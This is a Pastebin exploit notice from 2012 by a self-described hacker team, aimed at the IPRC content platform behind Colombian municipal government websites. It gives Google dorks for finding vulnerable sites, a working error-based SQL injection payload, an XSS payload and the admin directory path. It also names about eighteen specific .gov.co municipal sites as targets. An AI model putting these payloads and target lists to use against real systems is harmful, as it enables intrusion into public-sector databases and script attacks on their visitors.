API tools faq
paste
Advertisement
diego123

IPRC [Internet Para La Rendicion de Cuentas ] - SQL InjecTi

diego123
Nov 1st, 2012
165
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MySQL 6.98 KB | None | 0 0
raw download clone embed print report
  1. +-------------------------------------------------+
  2.  l # Author: Diego Asencio                        l
  3.  l # Twitter: @Diego_Asencio                      l
  4.  l # E-mail: diego.asencio@unillanos.edu.co       l
  5.  l # WorkGroup: [!]nside [0]utside - T34M         l
  6.  l # Twt_WG: @insid30utsid3                       l
  7. +-------------------------------------------------+
  8.  
  9. #################
  10. #  INFORMACION  #
  11. #################
  12. ###########################################################################################################
  13. # Exploit Title: IPRC  -  SQL InjecTion / Cross-Site Scripting                                        
  14. # Vendor Name: Internet Para La Rendicion de Cuentas                                              
  15. # Url Vendor:  http://www.iprc.org.co                                                                              
  16. # Category: WebApps                                                                                                            
  17. # Risk: Critical                                                                                                                          
  18. # GoogleDork: "index.shtml?apc=I-xx-1-&x="  [or] "sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D= "                                                                                  
  19. # 0day exploits : 1337day.com Inj3ct0r Exploit DataBase                                          
  20. ###########################################################################################################
  21.  
  22. #################
  23. #    3XPL0IT    #
  24. #################
  25. ###########################################################################################################
  26. #  -  [SQL]  -                                                                                                                                  
  27. #   http://www.[M/pio]-[Dep/to].gov.co/index.shtml?apc=I-xx-1-&x=[SQL]        
  28. #                                                                                                                                                        
  29. #  -  [XSS]  -
  30. #   http://www.[M/pio]-[Dep/to].gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                                
  31. #
  32. #    (  XpL SQL )
  33. #
  34. #   2192436 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
  35. Count(table_name) of information_schema.tables where table_schema=0x64625F3835303130
  36. #
  37. #   (XpL XSS )
  38. #
  39. #   "><img src=http://1337day.org/img/logo_green.jpg onerror=alert("1337");>                                                                                                                                                    
  40. #                                                                                                                                                      
  41. #  -----------------------------------------------------------------------------------------------------  
  42. #                 [ SAMPLE'S WEBSITES AFFECTED (SQL && XSS) INJ3CTI0N ]                    
  43. #  ______________________________________________________________________________________________________                  
  44. #                                                                                                                                                      
  45. #                                       # -  SQL - #                                                                  
  46. #    http://www.puertolopez-meta.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]    
  47. #    http://www.aguazul-casanare.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]    
  48. #    http://www.abejorral-antioquia.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]  
  49. #    http://www.cantagallo-bolivar.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]    
  50. #    http://www.caldono-cauca.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]          
  51. #    http://www.belen-boyaca.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]            
  52. #    http://www.istmina-choco.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]          
  53. #    http://www.riodeoro-cesar.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]          
  54. #    http://www.yopal-casanare.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]        
  55. #    http://www.sucre-cauca.gov.co /index.shtml?apc=I-xx-1-&x=[SQL]              
  56. #  _______________________________________________________________________________________________________              
  57. #                                                                                                                                                      
  58. #                                         #  - XSS  - #                                                                  
  59. #    http://www.caqueza-cundinamarca.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                              
  60. #    http://www.caracoli-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                                  
  61. #    http://www.caramanta-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                              
  62. #    http://www.carepa-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                                  
  63. #    http://www.www.carmendecarupa-cundinamarca.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                              
  64. #    http://www.carolinadelprincipe-antioquia.gov.co /sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                                  
  65. #    http://www.cartagenadelchaira-caqueta.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                            
  66. #    http://www.castillalanueva-meta.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]                                                                
  67. #                                                                                                                                                    
  68. ########################################################################################################
  69. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  70. ::          Directory Admin :  /apc-aa/admin/          ::
  71. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  72.  
  73.  
  74.  
  75. #############
  76. #  Greet's  #
  77. #################################################################################
  78. #    @Sr_Xaoc -  @ZiriusOpCol - @n4p573r  - @Nick_Nitrous - @Ur0b0r0x           #
  79. #      @inj3ct0r - @Insid30utsid3 - @Anonymous_Co - @The_RevolutionH            #
  80. #                               @unillanos_                                     #                                                        #                                  2012                                         #
  81. #################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!